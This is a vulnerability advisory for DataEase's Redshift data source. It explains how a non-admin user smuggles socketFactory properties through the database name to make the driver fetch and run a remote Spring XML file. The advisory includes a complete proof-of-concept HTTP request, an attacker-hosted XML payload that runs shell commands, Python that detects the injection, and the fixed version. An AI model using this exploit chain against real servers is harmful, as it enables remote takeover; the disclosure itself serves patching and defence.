Impact
In DataEase, a normal (non-administrator) user is allowed to manage data sources. The AWS Redshift data source does not apply proper security checks to the user-supplied connection properties, which leads to remote code execution.
A normal user can supply the properties used to connect to AWS Redshift.
Unlike the PostgreSQL or MySQL data sources, the Redshift data source does not accept EXTRA_PARAMS, but that is not an obstacle to constructing a remote code execution chain.

The database field is not normalized, so the attacker can supply a database name that carries its own JDBC query string, for example test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}
The complete configuration looks like this (payload is the URL of the attacker-hosted Spring XML file):
configuration = { "initialPoolSize":5,"schema":"jdbc",
"extraParams": "",
"minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,
"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100",
"dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload),
"username":"test","password":"test","port":"5432"}
Because the database name is appended unchanged to the JDBC URL, the Redshift driver parses socketFactory and socketFactoryArg as connection properties, and code execution is triggered the same way as in the PostgreSQL driver:
from com.amazon.redshift.Driver#connect
then in com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory, which instantiates the class named in socketFactory with socketFactoryArg as its constructor argument. With ClassPathXmlApplicationContext that argument is a bean-definition URL, so the driver fetches and evaluates attacker-controlled Spring XML.
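The following is an added example, not code from the advisory or from DataEase, showing the injection mechanism and the check that stops it. It mirrors the vulnerable behaviour described above (the dataBase value concatenated straight into a jdbc:redshift:// URL), splits the resulting URL the way a JDBC driver does so the smuggled socketFactory and socketFactoryArg properties become visible, and contrasts that with a hardened builder that validates the database name first. The URL layout, the allow-list regex and the helper names are assumptions; the configuration values are the advisory's own lab values, embedded here as a constructed sample.

```python
import base64
import json
import re
from urllib.parse import parse_qs

# Constructed sample: the decoded data-source configuration from the advisory.
# Host, port and the XML URL are the advisory's lab addresses, not live hosts.
ATTACKER_CONFIG = {
    "initialPoolSize": 5, "schema": "jdbc", "extraParams": "",
    "minPoolSize": 5, "maxPoolSize": 50, "maxIdleTime": 30,
    "acquireIncrement": 5, "idleConnectionTestPeriod": 5,
    "connectTimeout": 5, "customDriver": "default", "queryTimeout": 30,
    "host": "192.168.0.100", "port": "5432",
    "dataBase": ("test?socketFactory=org.springframework.context.support."
                 "ClassPathXmlApplicationContext"
                 "&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml"),
    "username": "test", "password": "test",
}

# Driver properties the advisory shows being smuggled through the database name.
DANGEROUS_JDBC_PROPERTIES = {"socketFactory", "socketFactoryArg"}


def encode_request_configuration(cfg: dict) -> str:
    """Wrap a configuration the way the advisory's POST body carries it:
    JSON, base64-encoded, inside the "configuration" field."""
    raw = base64.b64encode(json.dumps(cfg).encode()).decode()
    body = {"configuration": raw, "apiConfiguration": [],
            "type": "redshift", "name": "test", "configurationEncryption": True}
    return json.dumps(body)


def decode_request_configuration(body_json: str) -> dict:
    """Reverse of encode_request_configuration: recover the configuration dict."""
    body = json.loads(body_json)
    return json.loads(base64.b64decode(body["configuration"]))


def build_jdbc_url_unsafe(cfg: dict) -> str:
    """Vulnerable shape described in the advisory: dataBase is concatenated into
    the URL with no normalization. Assumed layout; the page does not show
    DataEase's real URL-building code."""
    return f"jdbc:redshift://{cfg['host']}:{cfg['port']}/{cfg['dataBase']}"


def jdbc_properties(url: str) -> dict:
    """Split the URL's query string the way a JDBC driver does, so the
    connection properties a smuggled database name contributes are visible."""
    _, _, query = url.partition("?")
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def smuggled_properties(cfg: dict) -> dict:
    """Detection view: dangerous driver properties hidden inside dataBase."""
    props = jdbc_properties(build_jdbc_url_unsafe(cfg))
    return {k: v for k, v in props.items() if k in DANGEROUS_JDBC_PROPERTIES}


# Assumption: a conservative allow-list for database names. Anything that can
# start or extend a query string ('?', '&', '=', '/', whitespace) is rejected.
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_$]{1,127}$")


def is_safe_database_name(name: str) -> bool:
    return DB_NAME_RE.fullmatch(name) is not None


class UnsafeDatabaseName(ValueError):
    pass


def build_jdbc_url_safe(cfg: dict) -> str:
    """Hardened shape: validate the database name before it reaches the URL."""
    name = cfg["dataBase"]
    if not is_safe_database_name(name):
        raise UnsafeDatabaseName(f"rejected database name: {name!r}")
    return f"jdbc:redshift://{cfg['host']}:{cfg['port']}/{name}"


if __name__ == "__main__":
    cfg = decode_request_configuration(encode_request_configuration(ATTACKER_CONFIG))
    print("URL the driver would see:", build_jdbc_url_unsafe(cfg))
    print("smuggled properties:", smuggled_properties(cfg))
    try:
        build_jdbc_url_safe(cfg)
    except UnsafeDatabaseName as exc:
        print("hardened builder:", exc)
```

The same split used by smuggled_properties doubles as a detection rule for the validate endpoint: any dataBase value that yields a non-empty property map has been used to smuggle driver options, whichever data-source type it arrives under.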
POC
POST /datasource/validate/ HTTP/1.1
Host: 192.168.0.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: [A normal user token]
LINK-PWD-TOKEN: null
Content-Length: 889
Origin: http://192.168.0.102/
Connection: close
Referer: http://192.168.0.102/
{"configuration":"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","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}
Base64-decoding the configuration field gives:
{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}
Then run an HTTP server on 192.168.0.100:48080 serving the file calculator2.xml:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
           http://www.springframework.org/schema/beans
           http://www.springframework.org/schema/beans/spring-beans.xsd
       ">
    <bean id="pb" class="javax.script.ScriptEngineManager">
        <property name="message" value="#{ pb.getEngineByName('nashorn').eval('java.lang.Runtime.getRuntime().exec(''touch /tmp/redshift2'')') }" />
    </bean>
</beans>
Affected versions: <= 1.18.4
Patches
The vulnerability has been fixed in v1.18.5.
Workarounds
Upgrade to v1.18.5.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at wei@fit2cloud.com